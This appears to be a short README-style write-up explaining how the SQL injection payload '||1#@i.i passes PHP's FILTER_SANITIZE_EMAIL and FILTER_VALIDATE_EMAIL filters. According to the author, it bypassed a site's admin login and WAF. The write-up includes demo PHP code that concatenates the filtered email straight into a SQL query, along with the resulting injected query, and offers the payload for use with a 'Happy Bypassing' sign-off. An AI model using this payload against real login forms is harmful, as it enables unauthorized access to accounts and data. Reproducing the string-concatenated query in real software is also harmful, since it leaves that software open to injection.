filter-var-sqli copied to clipboard
Bypassing FILTER_SANITIZE_EMAIL & FILTER_VALIDATE_EMAIL filters in filter_var for SQL Injection ( xD )
Valid Email !!
While testing a site, I came across it's admin panel and got stuck at login. The common SQLi login bypass payloads weren't working and WAF was too much disturbing.
But after observing 3 types of errors "Wrong Username or Password","Error Occured" and "Invalid Email", I found that
was considered as valid email and it bypassed the WAF and boom, I got in :D
After looking at the source code I saw that FILTER_SANITIZE_EMAIL and FILTER_VALIDATE_EMAIL filter were being used.
is a valid email according to FILTER_VALIDATE_EMAIL filter, i.e:
$email = "'||1#@i.i";
$email = filter_var($email, FILTER_SANITIZE_EMAIL);
if (filter_var($email, FILTER_VALIDATE_EMAIL)) {
echo 'Valid email !!<br>';
$query = "SELECT * FROM login WHERE email='$email'";
echo $query;
will output:
Valid email !!
SELECT * FROM login WHERE email=''||1#@i.i'
Therefore '||1#@i.i
can be used as a payload for SQLi login bypass when FILTER_SANITIZE_EMAIL &/|| FILTER_VALIDATE_EMAIL are in effect.
Some other payloads:
and some others..
FILTER_SANITIZE_EMAIL strips " therefore "||1#@i.i cannot be used
Therefore it can be used when FILTER_SANITIZE_EMAIL and WAF are in place.
You can try these in vulnerable login.php file
Happy Bypassing ^i^
The contributor(s) cannot be held responsible for what you do with the information and code provided. This is intended for professional and educational purposes only.